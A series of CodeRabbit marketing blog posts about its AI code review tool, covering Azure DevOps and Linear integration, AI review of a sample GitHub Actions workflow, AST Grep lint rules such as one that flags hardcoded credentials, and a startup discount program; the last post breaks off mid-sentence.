![](https://victorious-bubble-f69a016683.media.strapiapp.com/03f234289fb7db228a1670b28da85ecf4b79fdd382c712099cf4c123db10554d_9828753fa5.png) * Request permissions from the Org administrator. CodeRabbit is a verified application on Azure DevOps. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d8f4e1de78bc04099171f16f5761b35bee5f779abe0e466a04cb9ad669a0f4dc_ae8dd2e8f9.png) * Create a Personal Access Token from the Azure DevOps Console ![](https://victorious-bubble-f69a016683.media.strapiapp.com/3f575a5e5f1e7c71152fa2834693d48e86772567cb3aadef623fda26069ae978_e5a8d7d247.png) * Configure CodeRabbit ![](https://victorious-bubble-f69a016683.media.strapiapp.com/ad0215dc96bf97b71090fba941d50f3cad03722874bcfd80d0b58171d6b7f16e_d6394869a5.png) * Enable the repo for CodeRabbit reviews. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/65f7076131ccf7c87d4901b77697a442316b8eaa0d6d04f4551ff17f57d8a7ee_6b0c7f8c83.png) * Trigger code review to see CodeRabbit post a review within minutes. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/8cd02c041f4ba665c4e339493bd26c825031eba23d9ba6995a10ef6184820c05_458c3f987e.png) Note: If you face issues getting reviews triggered, you might want to check your Project Settings -> Service Hooks. CodeRabbit creates multiple webhooks for each repository. ### Key Benefits of CodeRabbit with Azure DevOps * **Early issue detection**: CodeRabbit performs a thorough, line-by-line review of your code changes within Azure DevOps organization, ensuring that no potential issues slip through the cracks. By identifying and addressing issues at the earliest possible stage, CodeRabbit helps maintain a high-quality codebase and prevents tech debt accumulation. * **Code Consistency and Standards**: CodeRabbit integrates with your linters to automatically enforce coding standards without the need for custom configurations. We learn your organization's unique conventions (stored within your repo on Azure DevOps) and ensure all new code in pull requests adheres to them. With CodeRabbit, developers can focus on innovation while maintainable, consistent code becomes the default. * **1-Click Fixes, Chat and more:** We identify and suggest 1-click fixes within the PR of Azure Repo. In addition to providing 1-click fixes, CodeRabbit allows developers to chat, generate unit test code and reason about the 1-click fixes directly within the PR pane in Azure DevOps org interface. Developers can view and apply these suggestions without disrupting their workflow. ### Get started The integration of [CodeRabbit](https://coderabbit.ai/) with [Azure DevOps](https://dev.azure.com) brings the power of AI-native code reviews to teams using this popular development platform. By leveraging CodeRabbit's advanced code review capabilities, developers can identify and fix issues early in the development cycle, improve code quality, and enhance overall productivity. Try it out for yourselves today. Create a [CodeRabbit](https://app.coderabbit.ai/login) account today!

How To Run Static Analysis On Your CI/CD Pipelines Using AI

Atulpriya Sharma — Thu, 17 Oct 2024 00:00:00 GMT

*“An inadvertent misconfiguration during a setup left a data field blank, which then triggered the system to automatically delete the account.” -* was [Google's explanation for accidentally deleting a pension fund's entire account](https://www.business-standard.com/world-news/google-cloud-accidentally-deletes-125-billion-australian-pension-fund-124051800606_1.html). Incidents like these highlight the importance of configuration accuracy in modern software systems. A simple misconfiguration can have devastating consequences, particularly in CI/CD pipelines. Ensuring configuration accuracy and managing the complexity of code reviews can be daunting for DevOps engineers. Teams often prioritize feature development, leaving configuration reviews as an afterthought. This can lead to unnoticed misconfigurations, causing production issues and downtime. CodeRabbit helps solve this by automating code reviews with AI-driven analysis and real-time feedback. Unlike other tools requiring complex setups, CodeRabbit integrates seamlessly into your pipeline, ensuring that static checks on configuration files are accurate and efficient. In this blog post, we will look at CodeRabbit and how it helps with static checking in CI/CD Pipelines, ensuring configuration quality and improving efficiency throughout the end-to-end deployment process. ## Why Static Checking is Crucial in CI/CD Pipelines Configuration files are the backbone of CI/CD pipelines that control the deployment of infrastructure and applications. Errors in these files can lead to costly outages and business disruptions, making early validation essential. Static checking is vital in mitigating security vulnerabilities, code quality issues, and operational disruptions. Below is an example of a Circle CI workflow configuration file that sets up a virtual environment, installs requirement dependencies, and executes linting commands. ```yaml jobs: lint: docker: - image: circleci/python:3.9 steps: - checkout - run: name: Install Dependencies command: | python -m venv venv . venv/bin/activate pip install flake8 - run: name: Run Linting command: | . venv/bin/activate flake8 . ``` If static checking didn’t happen in the above configuration, issues like unrecognized syntax or invalid configurations in the Python code could leak, causing the build to fail at later stages. For example, missing dependencies or improperly formatted code could lead to runtime errors that break deployment pipelines or introduce hard-to-trace bugs in production. Overall, static checking helps with: * **Early error detection**: A static check identifies syntax errors and misconfigurations in code before execution, reducing the likelihood of runtime failures. * **Enforce coding standards**: This ensures consistent code quality by enforcing style guidelines and best practices across code and configuration files, making it easier to maintain & review changes. * **Enhancing Code Quality**: Static checks help enforce criteria like passing tests or x% of code coverage, which must be met before any deployment, thus improving the overall quality. ## Using CodeRabbit For Static Checking CodeRabbit gives an edge by integrating with your CI/CD workflows and identifying common misconfigurations. This capability is crucial for maintaining the integrity of the deployment process and preventing disruptions that could affect end-users. In addition, it provides a distinctive benefit in executing static analysis and linting automatically, requiring no additional configuration. For DevOps teams, this functionality streamlines the setup process so they can concentrate on development rather than complicated settings. * It integrates with your CI/CD pipelines without causing any disruption and automatically runs linting and static analysis out of the box, requiring no additional configuration. * It supports integration with a wide range of tools across popular CI/CD platforms like GitHub, CircleCI, and GitLab, running checks such as [Actionlint](https://docs.coderabbit.ai/tools/actionlint), [Yamllint](https://docs.coderabbit.ai/tools/yamllint), [ShellCheck](https://docs.coderabbit.ai/tools/shellcheck), [CircleCI](https://docs.coderabbit.ai/tools/circleci) pipelines, etc. This simplifies setup, providing quick results without additional manual effort. * For tools like Jenkins and GitHub Actions, CodeRabbit continuously runs static analysis on every build or commit, catching misconfigurations early and improving workflow reliability. Let us look at CodeRabbit in action in the following section. ## Detecting Misconfiguration with CodeRabbit and GitHub Actions Actionlint To demonstrate the functionality of CodeRabbit, let us look at how we integrate a GitHub Actions workflow into a project to automate the CI/CD pipeline. The repository has a configuration file with potential errors, which will be flagged and reported by CodeRabbit. Below is a diagram of the sequence of tasks in the workflow file we created. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/82c37e735d2d7b717a4e4d99ffc969cfef65ef41cfe29f281b700b320ecd00b7_fec30bdc73.png) By submitting a pull request, we allowed CodeRabbit to review the file and detect potential misconfigurations automatically. Once the repository is prepared, we [integrate it with CodeRabbit to set up automated code reviews](https://coderabbit.ai/blog/how-to-integrate-ai-code-review-into-your-devops-pipeline) and generate a comprehensive, structured report consisting of the following key sections. * **Summary** – A concise overview of the key changes detected in your code or configuration. This helps you quickly understand the main areas that need attention. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/d56da80a750613b316a45423b880a6c97593d8ddc9068a85c194a42183ac1338_87b42fe802.png) * **Walkthrough** – A detailed, step-by-step analysis of the reviewed files, guiding you through specific issues, configurations, and recommendations. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b09bcf1e8457f0638a3d560d59d5f4716d6e0c17f8c07de9ba3577ffe7a328dc_84c1640739.png) * **Table of Changes** – A table listing all changes in each file and a change summary. This helps you quickly assess and prioritize necessary actions. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/58b6f5ec9883482b80b57da6b4df3ab7b6f69b3017adc2e0774963de2a4c34af_4ab1d7ccbb.png) You can customize these sections by tweaking the configuration file or using the [CodeRabbit dashboard](https://app.coderabbit.ai/). Refer to our [CodeRabbit configuration guide](https://docs.coderabbit.ai/configure-coderabbit) to learn more. Here a sample workflow.yaml config file, on which detailed insights and recommendations through CodeRabbit's review process. ```yaml name: development task on: push: branches: - main - develop - staging pull_request: branches: - main - develop - staging jobs: lint: runs-on: ubuntu-latest steps: - name: Checkout code uses: actions/checkout@v3 - name: Lint workflow YAML files uses: rhysd/actionlint@v1 - name: Setup Node.js uses: actions/setup-node@v3 with: node-version: '18' - name: Install dependencies run: npm install - name: Lint JavaScript code run: npm run lint build: runs-on: ubuntu-latest needs: lint steps: - name: Checkout code uses: actions/checkout@v3 - name: Setup Node.js uses: actions/setup-node@v3 with: node-version: '18' - name: Install dependencies and cache uses: actions/cache@v3 with: path: ~/.npm key: ${{ runner.os }}-node-${{ hashFiles('package-lock.json') }} restore-keys: | ${{ runner.os }}-node- run: npm install - name: Run tests run: npm test - name: Check for vulnerabilities run: npm audit --production terraform: runs-on: ubuntu-latest needs: build steps: - name: Checkout code uses: actions/checkout@v3 - name: Setup Terraform uses: hashicorp/setup-terraform@v2 with: terraform_version: 1.5.0 - name: Terraform init run: terraform init working-directory: infrastructure/ - name: Terraform plan run: terraform plan working-directory: infrastructure/ - name: Terraform apply (development) if: github.ref == 'refs/heads/develop' run: terraform apply -auto-approve working-directory: infrastructure/ env: AWS_ACCESS_KEY_ID: ${{ secrets.AWS_ACCESS_KEY_ID }} AWS_SECRET_ACCES_KEY: ${{ secrets.AWS_SECRET_ACCES_KEY }} docker: runs-on: ubuntu-latest needs: terraform steps: - name: Checkout code uses: actions/checkout@v3 - name: Login to AWS ECR id: login-ecr uses: aws-actions/amazon-ecr-login@v1 with: region: us-east-1 - name: Build and tag Docker image run: | IMAGE_TAG=${{ github.sha }} docker build -t ${{ secrets.ECR_REGISTRY }}/my-app:latest . echo "IMAGE_TAG=$IMAGE_TAG" >> $GITHUB_ENV - name: Push Docker image to AWS ECR run: | IMAGE_TAG=${{ env.IMAGE_TAG }} docker push ${{ secrets.ECR_REGISTRY }}/my-app:$IMAGE_TAG deploy: runs-on: ubuntu-latest needs: docker environment: production steps: - name: Deploy to Development if: github.ref == 'refs/heads/develop' run: | echo "Deploying to development environment" # Your deployment script here - name: Deploy to Staging if: github.ref == 'refs/heads/staging' run: | echo "Deploying to staging environment" # Your deployment script here - name: Manual Approval for Production if: github.ref == 'refs/head/main' uses: hmarr/auto-approve-action@v2 with: github-token: ${{ secrets.GITHUB_TOKEN }} - name: Deploy to Production if: github.ref == 'refs/heads/main' run: | echo "Deploying to production environment" # Your deployment script here ``` Before getting into the code review, here’s a high-level overview of what the workflow file accomplishes: * Triggers the CI/CD pipeline on pushes and pull requests to the main, develop, and staging branches, ensuring continuous integration. * Executes a linting workflow that checks the syntax of the YAML configuration and installs the necessary dependencies for the application to ensure code quality. * Sets up Terraform to manage and provision the cloud infrastructure needed for the application. * Executes tests to validate the functionality of the application and checks for vulnerabilities, ensuring the code is secure and stable. * Builds and tags a Docker image for the application, preparing it for deployment. * Pushes the Docker image to AWS Elastic Container Registry (ECR), enabling easy access for deployment. * Deploys the application to different environments (development, staging, and production) based on the branch, including a manual approval step for production deployments to ensure control and oversight. Having examined the workflow.yaml configuration file and its various components, we now delve into the individual section, starting with the summary. ### Summary This summary serves as an essential first step in the review process, offering a clear and concise overview of the changes introduced in the latest commit. It provides a quick understanding of the key aspects covered, including new features, styling adjustments, configuration changes, and other relevant modifications raised in the pull request. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/e84d1c1ef723f333fbdb9d5de330847aacff41614bff36565b3353b164313429_daa6eefe9d.png) The above snippet highlights important maintenance tasks, including running the application in non-debug mode for improved performance and implementing an automated CI/CD pipeline to streamline code linting, building, and deployment processes. This summary helps in understanding the key changes and enhancements made in the latest commit. After reviewing the key changes in the Summary, we can explore the Walkthrough section of the report, which provides a detailed breakdown of specific modifications. ### Walkthrough This section provides a comprehensive overview of the specific modifications made across different files in the latest commit. Each file is assessed for its unique contributions to the project, ensuring clarity on how these changes enhance the overall functionality and user experience. The Changes Table serves as a concise summary of specific modifications made across various files in the latest commit, allowing developers to quickly identify where changes have occurred within the codebase. Each row indicates an altered file, accompanied by a detailed description of the modifications in the Change Summary column. This includes updates related to styling in CSS files, application logic functionality adjustments, and CI/CD pipeline configuration enhancements. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/acc1bb84d9eb8103152175f9c618171f80f86aa9b1fd48bc145e01c72e8c2466_4a21655ee8.png) By presenting this information in a structured format, the table offers clarity and organization, making it easier for developers to digest and understand the impact of each change on the project. Overall, It acts as an essential reference for collaboration, enabling team members to focus on pertinent areas that may require further discussion or review while tracking the evolution of the codebase. To add some fun elements, it generates a poem for your errors. ### Code Review The following section thoroughly examines the configuration file, identifying areas for enhancements. From improving caching strategies to optimizing deployment processes, these recommendations are designed specifically to code to enhance your GitHub Actions workflow's overall efficiency and robustness. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/8205895249332b1f89e9a6f1a6952ed91b6c85ecbb755c376df221691cce3c98_cedf009c98.png) It provides details and an overview of the **actionable comments** about the review details, the configuration used, the review profile, the files selected for processing, and the additional context used. These can also include one-click commit suggestions. Let us look at the various review comments that CodeRabbit suggested for various sections of the workflow file. It automatically detects that the configuration file is a GitHub Actions workflow and uses `actionlint` to analyze it thoroughly. During the review, CodeRabbit provides valuable insights and suggestions for optimizing performance. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b90fed0079413daafc7df51764bd44eef4c30b982434c57b2b1baccbf76917a2_72e8a0f8f3.png) In our lint job it identified an opportunity to cache npm dependencies using `actions/cache@v3`. By recommending the addition of a caching step before the linting process it helps reduce execution time for subsequent runs. This proactive feedback streamlines workflows without requiring manual intervention, ensuring a more efficient and optimized CI/CD pipeline. As it points out, the caching step is incorrectly structured. The run command (npm install) is placed within the uses block of the cache action, which could lead to improper execution. To resolve this, it suggests separating the caching and installation steps. The corrected version moves the cache logic into its own block and ensures the npm install command is executed independently in the next step, using `npm ci` for a cleaner, faster installation of dependencies. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/66303693c8068f36c22669f46ca101fc7da2952cae771ac0099b6916fd6b3929_2a17413295.png) In the Terraform section of the configuration, it detects a potential issue using a variable for the Terraform version. Additionally, AWS credentials too would cause an issue, especially in `plan` and `apply` steps. Lastly, it detects typos in `AWS_SECRET_ACCESS_KEY`, as even minor mistakes can cause failures in your pipeline's execution. It suggests the changes in the configuration that fixes the typos, makes the Terraform version easily updatable, and ensures AWS credentials are available for all Terraform commands. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/df9d17e49920896cf5374c5d4cd777b9c2dcedb1fcf40377417cee2fecf04f28_1344e8c2c9.png) In the docker job, it detects security vulnerabilities as the image is using the latest tag for the Docker image, which can be problematic for image versioning and rollbacks. It suggests configuration changes that consider both the latest tag and a specific version tag (e.g., git SHA) for better traceability and easier rollbacks. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b43899f8043fa4d116ceccba98fcd50f4dc48b7e5b3ad971d9b64b0e65beddee_c9bf72256a.png) It also detected several potential issues in the deploy job that need attention. The manual approval step uses an auto-approve action, which defeats its purpose. Further, it finds a syntax error in the production deployment step, and the actual deployment scripts are missing, making the process incomplete. It suggests changes for these potential issues along with the required changes. CodeRabbit’s AI-powered analysis showed how configuration file issues were quickly identified, highlighted, and suggested changes. ## Benefits of Using CodeRabbit in CI/CD Pipelines By automating code reviews and providing precise feedback, CodeRabbit improves code quality and ensures that potential issues and vulnerabilities in your CI/CD pipeline are caught early, leading to smoother deployments and fewer errors. Let us look at some of the larger benefits of using CodeRabbit in CI/CD pipelines: ### Enhanced Developer Productivity By performing automated static checking workflows, CodeRabbit reduces the need for manual reviews and enables DevOps engineers to focus on strategic tasks like optimizing infrastructure and deployment processes rather than fixing configuration issues. Its instant feedback loop ensures issues are detected quickly and addressed after every commit, allowing you to maintain a rapid development pace. ### Improved Code Quality CodeRabbit enforces consistent configuration standards by automatically validating configuration files against the best practices and catching configuration errors early. The platform learns from the previous review, intelligently suppresses repetitive alerts and allows you to focus on the most critical issues, making code reviews more efficient without compromising on thoroughness. CodeRabbit can also provide one-click suggestions that you can quickly integrate into your configuration files. ### Security CodeRabbit helps DevOps engineers catch security vulnerabilities early, such as misconfigured access controls or insecure settings, reducing the chance of breaches. By integrating static checks into the CI/CD process, CodeRabbit prevents configuration errors from causing deployment failures, ensuring a more stable and reliable software delivery pipeline. ## Conclusion We saw in this post how misconfigurations can lead to delays, security vulnerabilities, or even broken deployments, making it essential to test them just as rigorously as application code. Unlike traditional approaches that overlook the criticality of testing configuration files, [CodeRabbit](https://coderabbit.ai) helps review CI/CD pipelines by automating code/config reviews, catching critical errors, and enhancing overall code quality. It significantly reduces manual review time, allowing DevOps teams to focus on strategic tasks and accelerate deployment cycles. Experience the impact of AI code review on your workflows – [start your free CodeRabbit trial today](https://coderabbit.ai/).

The AI-Native Universal Linter: Code Quality at Scale with AST Grep and LLMs

Aravind Putrevu — Tue, 15 Oct 2024 00:00:00 GMT

Smart teams embrace coding standards; smarter teams make them a habit. Coding standards often take a backseat to tight deadlines and pressure to ship features quickly. However, neglecting coding standards leads to a host of problems down the road, affecting code maintainability and increasing bug rates. Coding standards are a set of guidelines, best practices, and conventions that dictate how code is written and organized within a codebase. They cover aspects such as naming conventions, formatting, and architectural patterns. The primary goal of coding standards is to make the codebase more consistent, readable, and maintainable. Following coding standards can feel like navigating a maze blindfolded, it’s easy to get lost and frustrated. But what if you had a guide who can assist you in that path clearly? Enter [AST Grep](https://ast-grep.github.io/)\+ Generative AI - a powerful tool in the hands of developers to automate and simplify the process of maintaining code quality. In this blog, we will explore how you can leverage **Coding Standards as Code** using AST Grep + Generative AI, and streamline the code quality for code written in any programming language. ## **Linters, the first line of defense** Linters are the unsung heroes of code quality (minus the noise!). The static code analysis tools have been the first line of defense against code quality for many decades. Static Analysis tools scan the codebase, potentially flagging problems and enforcing coding standards ranging from security impact to style and conventions. ### **Noisy nags or Helpful guides?** Linters have a reputation for being noisy, flagging every minor issue and style inconsistency with a relentless fervor. Developers often find themselves in a love-hate relationship with these tools, appreciating the responses from these scanners, while simultaneously cursing the endless stream of warnings and errors. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b5c7959897f61edfdfa25a273716827cce593480025f0bd97e7c6ac4b555cb46_409097ebde.png) Beneath the noise, linters act as a constant reminder to write clean, consistent, and maintainable code. They nudge developers towards best practices and help prevent the accumulation of tech debt. ### **Some popular linters to keep in your toolbelt** Few examples of the powerful linters across different programming languages. * [Biome.js](https://biomejs.dev/): A pluggable code quality tool for JavaScript/TypeScript projects. Biome.js offers a unified interface running various lint rules, formatters, and static analyzers. Biome simplifies the setup and configuration of adding a code quality tool. To customize Biome needs a `biome.config.js` or `biome.config.ts` file. * [Ruff](https://docs.astral.sh/ruff/): A fast and user-friendly linter for Python. Ruff is built-in with a formatter, linter, and includes rules from other python-specific linters. It encompasses 800-lint rules and replaces [50+ python code quality](https://docs.astral.sh/ruff/rules/) related packages. Ruff uses a `pyproject.toml` or `.ruff.toml` as a guidance. * [PHPStan](https://phpstan.org): PHPStan performs static code analysis and finds potential bugs and promotes best practices. PHPStan can be configured with `phpstan.neon` or `phpstan.neon.dist`. If you notice, you need to configure linters individually, with each linter having their own complexity, inconsistency or conflicting rules with org coding policies, varied granularity, and maintenance. ## **Linters and Generative AI** We are in the era of generating images, text, audio and even Code. Code is sacrosanct for developers, and just like that code can be generated at the press of a button now. Powerful Large Language Models (LLMs), enriched with deep reasoning capabilities, help generate contextual code that matches the need. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/b15644cdd99a19c63025c938e746b8a0da5248a825ba91920e7b77a89d0de52c_a9dabb5567.gif) Not just code, these LLMs can also generate the tooling specs like yaml, Dockerfile, including lint configurations. With the adoption of AI coding assistants, developers are writing more features than ever. While impressive, the generated code may still contain bugs or not fully align with the specific requirements and coding standards of the organization. Similarly, generated linter configurations might not be as effective as rules that fit your organization's guidelines. The role of Linters and Code Review remains crucial. Interestingly, this is a good problem to solve on both sides, again, using Generative AI. ## AST Grep: A Smarter Approach to Code Quality [AST Grep](https://ast-grep.github.io/) is powerful tool that allows you to write custom rules using a simple regex-like query language to match code patterns. Let us take a look at some sample Python code and how AST Grep can detect patterns. ```python def authenticate(username, password): if username == "admin" and password == "supersecret": return True return False ``` ### AST Grep Pattern ```python // secret_detector.yml id: detect-hardcoded-credentials language: python rule: pattern: |- def $FUNC_NAME($USERNAME, $PASSWORD): if $USERNAME == "$USER_VALUE" and $PASSWORD == "$PASS_VALUE": return True return False message: "Hardcoded credentials detected in authentication function" severity: warning ``` ### Run AST Grep ```python sg --rule-file secret_detector.yml /path/to/your/python/files ``` ```python sample_code.py: Potential hardcoded secret detected if username == "admin" and password == "supersecret": ^^^^^^^^^^^^^^^^^^^^^^^^ ``` > Note: You can run this rule live in the [AST Grep playground](https://ast-grep.github.io/playground.html). You can write more complicated [AST Grep patterns](https://github.com/coderabbitai/ast-grep-essentials) to enforce coding standards and best practices specific to your repository or organization. ### **Discovering Code Intent with AST Grep** Beyond enforcing coding standards, AST Grep can be used to gain deeper insight or logical reasoning behind code flow. At organizations, various stakeholders make critical business decisions that are translated into code due to past incidents. By crafting targeted patterns, you can codify architectural decisions, or potential performance bottlenecks. For example, let’s say you want to detect whether a function is making a network call. ```yaml id: detect-requests-get language: Python rule: pattern: |- (call function: (attribute object: (identifier) @MODULE attribute: (identifier) @FUNCTION)) constraints: MODULE: regex: ^requests$ FUNCTION: regex: ^get$ message: "HTTP GET request detected. Ensure proper error handling and consider security implications." severity: warning ``` The rule looks for function calls where the `requests` module is used to make a `GET` request, indicating a network call. You identify network calls across your codebase even if the code is complex or poorly documented. Similarly, you can create [AST Grep Rules](https://ast-grep.github.io/guide/rule-config.html) to detect: * Usage of specific libraries or frameworks * Error handling patterns * Resource management (ex: opening and closing files) * Concurrency patterns (ex: usage of threads or async/await) By understanding the intent behind code snippets, you can make more informed decisions about refactoring, optimization, or architectural changes. ## **Coding Standards as Code with AST Grep and Generative AI** Now that we’ve seen how AST Grep can be used to discover intent behind the code, let’s take it a step further and explore how we can combine it with Generative AI to yield better results than Lint rules. In a typical Retrieval Augmented Generation (RAG), you supplement the LLM with more information from your retrieval and hence with context the LLM would generate a response. The retrieved context (vectorized data) grounds the LLM with factual information, reducing possible hallucinations. Because, unlike humans, the probability of LLMs false or inconsistent information increases with the complexity of the problem. By combining AST Grep with RAG, we can provide the LLM with highly relevant and focused context about the code being analyzed. AST Grep can extract specific code patterns, architectural decisions, and potential issues, which can then be fed into the LLM as additional context, thereby also suggesting 1-click fixes to the problems. Now, without writing a single lint rule, you have access to understand (reason), find and suggest fixes to most complex code problems. Let's say we use below AST Grep rule to identify all instances of database queries in a codebase: ```yaml id: parameterised-db-query language: python rule: pattern: $RESULTS = $DB.query($QUERY, $PARAM) message: "Consider using parameterized queries for better security" severity: WARNING fix: |- $RESULTS = $DB.execute($QUERY, ($PARAM,)) ``` AST Grep would find code snippets like: ```yaml results = db.query("SELECT * FROM users WHERE id = ?", user_id) ``` These snippets, along with their surrounding context, can be passed to the LLM as part of the RAG process. The LLM can then analyze the code, understand its intent, and generate suggestions or identify potential issues based on best practices and coding standards. In this case, the LLM might suggest using a ORM library like SQLAlchemy to make the code more maintainable and less prone to SQL Injection attacks. ```yaml user = User.query.filter_by(id=user_id).first() ``` This approach has several advantages over traditional linter rules in reducing noise, allowing feedback to be more nuanced and intelligent. LLMs can provide explanations and rationale for its suggestions. ### Deterministic Code Quality at Scale with CodeRabbit At CodeRabbit, we believe that the combination of RAG and AST Grep creates a powerful approach to enforcing coding standards. One of the key challenges with Generative AI models is their tendency to produce output that, while coherent and contextually relevant, may not always align with specific requirements of a given codebase. This is where deterministic grounding comes into play. ![](https://victorious-bubble-f69a016683.media.strapiapp.com/47ea48efe84582e33dca0671d2ed92624222c5458d1c2d4eb5f2fff10036d337_aa449aede2.png) By leveraging AST Grep to extract not just code patterns but also concrete, deterministic information about code (ex: variable names, function signatures, dependencies), we can provide LLMs with a more realistic context. This helps suppress the noise and variability in the given suggestions. This additional context guides the LLMs to generate suggestions that are not only conceptually relevant but also syntactically and semantically valid within the project's existing setup. For instance, going back to the database query example, the LLM-generated-suggestion to use an ORM library is contextually relevant. Developer can review the suggestion, and apply it with a single click, without the need to rewrite the code. ## AST Grep + RAG: The AI-native Universal Linter At this point, you might be thinking: "This all sounds great, but how can I actually start using these techniques in my own projects?" Enter [CodeRabbit](https://coderabbit.ai/) - AI Code Reviewer that works with existing code hosting platforms like GitHub, GitLab and Azure DevOps. At CodeRabbit, we’ve taken this concept and turned it into a powerful tool for developers improving developer productivity alongside their code. Our AI-native Code Reviewer harnesses the potential of LLMs and AST Grep. CodeRabbit also maintains unique and custom AST Grep rules under the [ast-grep-essentials](https://github.com/coderabbitai/ast-grep-essentials) GitHub repository for the developer community, do consider giving us a star. Sign up to [CodeRabbit](https://coderabbit.ai) and get started in your AI Code Quality journey.

Announcing CodeRabbit Startup Program

Aravind Putrevu — Mon, 30 Sep 2024 00:00:00 GMT

In the startup world, speed and quality are often seen as tradeoffs, with AI-powered code reviews you can have both. Startups and small dev teams face numerous challenges shipping code day-to-day while navigating tight deadlines, and meeting user expectations with limited resources. Every phase could be a leap to the next level of growth thereby improving the chance of standing out. At CodeRabbit, we understand the importance of shipping better-quality code. Being a startup ourselves we understand how much it matters to ship bug-free code thereby enabling better customer experiences. We are thrilled to announce our new Startup Program, designed to bring the power of AI-powered Code Reviews to emerging tech companies. ## CodeRabbit Startup Program Our startup program is designed to give early-stage companies access to AI-powered code review technology. We understand when you are building something new, every resource counts. CodeRabbit helps you to maximize your development team's potential. Our innovative system enhances **code quality** through intelligent PR reviews, ensuring your codebase remains robust and maintainable. We've also integrated advanced **code security** measures, safeguarding your applications against vulnerabilities. Our AI **copilot for pull requests** streamlines the review process, catching issues early and facilitating smoother collaborations. All of these features work in concert to boost overall **developer productivity**, allowing your team to focus on what truly matters - building and shipping great products. ### What's included in the Startup Program? * 50% off for 6 months on a CodeRabbit **Pro Plus annual plan** after the standard 14-day free trial period. * Support * Access to the CodeRabbit community on Discord [Discover the features and benefits of the Pro Plus Plan](https://www.coderabbit.ai/pricing) ### Eligibility Criteria * VC or accelerator-backed startups that do not yet have a CodeRabbit account * Funding of less than $25 million ## Benefits of using AI-powered Code Reviews CodeRabbit is your invisible Senior Engineer, reviewing every code change in real time. We could help you improve by: * Accelerating your development cycles * Improved code quality and security coverage - PR by PR. * Retaining best-practice learnings from human reviewers at an organization level. * Improving the developer and reviewer productivity by cutting bugs and review time in half. ## Getting Started with the Startup Program * Fill out the [Startup Program application form](https://coderabbit.ai/startup-program). * Our team will review your application within 2 business days. * You will receive an email with details informing the approval. At CodeRabbit, we believe that AI is not here to replace the developers but to improve their productivity and empower them. By handling the repetitive aspects of code review, [CodeRabbit](https://coderabbit.ai/) frees up your team to focus on what they do best: creating the best business outcomes! We are excited to partner with the next generation of tech companies and help them build robust, scalable solutions that will shape our future in many ways. Join our [startup program today](https://coderabbit.ai/startup-program) and experience AI-driven code reviews.

How to use CodeRabbit to validate issues against Linear Board

Aravind Putrevu — Wed, 04 Sep 2024 00:00:00 GMT

CodeRabbit is an AI code review tool that integrates with version control platforms like GitHub, GitLab, and Azure DevOps. It automatically analyzes pull requests, providing comprehensive reviews powered by Large Language Models (LLM). CodeRabbit offers detailed feedback, flags potential issues, and suggests code improvements. Teams can customize CodeRabbit's behavior through an intuitive UI or YAML configuration files, allowing it to adapt to specific project requirements and coding standards. But, do you know that CodeRabbit could also connect with your Issue Tracking or Project management tools like Linear and Jira to perform issue validation, performing a context-aware Pull-request review. This blog post covers CodeRabbit's feature that analyzes the issues linked to pull requests and checks whether the code changes effectively resolve linked issues. Whether you're using GitHub, Jira or Linear for issue tracking, CodeRabbit integrates with both. Before we explore Linear integration, if you're new to CodeRabbit, we suggest checking [this blog](https://coderabbit.ai/blog/how-to-integrate-ai-code-review-into-your-devops-pipeline). It explains how CodeRabbit performs code reviews for pull requests. This background will help you better understand the context of Linear integration. ### Setting up Linear Integration Head on to the Integrations section in [CodeRabbit](https://app.coderabbit.ai/) and flip the Linear button ON. You've now started the integration process. ![](https://framerusercontent.com/images/xdLp3Mfmk7yFvqshH6p0kFYuLo.png) Once you've enabled the integration, you'll need to authorize CodeRabbit to access your Linear workspace. The process differs slightly depending on whether you're a new or existing Linear user. If you're already using Linear, simply authorize it for your workspace. New to Linear? just follow the setup prompts to get everything configured. ![](https://framerusercontent.com/images/D5SHy7RDyI4zv67wd4uemh3w1oQ.png) With these two straightforward steps, you've successfully integrated CodeRabbit with Linear. This connection allows CodeRabbit to access your **entire** Linear workspace and provides context-aware code reviews for your pull requests. If you need to limit CodeRabbit's access to specific Linear projects, you can do it by three ways. #### Organization Settings Navigate to *Organization Settings* -> *Configuration* -> *Knowledge Base* -> *Linear Team Keys* section and enter the project keys of the Linear projects you want CodeRabbit to access. By doing this, you ensure that CodeRabbit only uses issue context from the projects you've specified, keeping other project data off-limits. ![](https://framerusercontent.com/images/sd6TDexbbrQ2QU72yEYRhP9w.png) #### Repository Settings Navigate to *Repository Settings* -> *Knowledge Base* -> *Linear Team Keys* section and enter the project keys of the Linear projects you want CodeRabbit to access. #### YAML Configuration If you're using YAML configuration (.coderabbit.yaml), you can also specify Linear team keys in the section shown below > linear: > > team\_keys: ```javascript Note:1. Each setting individually gets applied. It is YAML > Repository > Organization.2. We're assuming you've already connected GitHub and Linear, allowing you to manage GitHub issues through Linear. ``` On that note, if you haven't set up your GitHub and Linear integration yet, just head over to your Linear workspace settings. Click on 'Integrations', then 'GitHub'. From there, you'll see options to connect your GitHub account, link your organization, and select which repositories you want to sync with Linear. Once you are done with repository sync with Linear, your issues will sync between GitHub and Linear automatically. Create an issue in either place, and it'll show up in both. ### Context-aware PR Review using CodeRabbit’s Issue Validation CodeRabbit starts by identifying the issue linked to the Pull Request. It then analyzes the code changes in detail and evaluates whether these changes effectively address the linked issue, ensuring the intended problem is actually solved. The image below demonstrates how CodeRabbit provides its analysis, showing whether the Pull Request successfully addresses the linked issue. This assessment helps developers and reviewers quickly understand if the code changes align with the issue's requirements. In the below PR, CodeRabbit's analysis process begins by identifying the linked issue `#9220`, which aims to remove legacy `README.md` handling in programming exercises. It then examines the pull request's code changes across multiple files, focusing on modifications that treat `README.md` like any other file in the online code editor. CodeRabbit concludes that the pull request effectively addresses the linked issue, as indicated by the green checkmark in the "Assessment against linked issues" section. This demonstrates CodeRabbit's ability to validate whether code changes truly 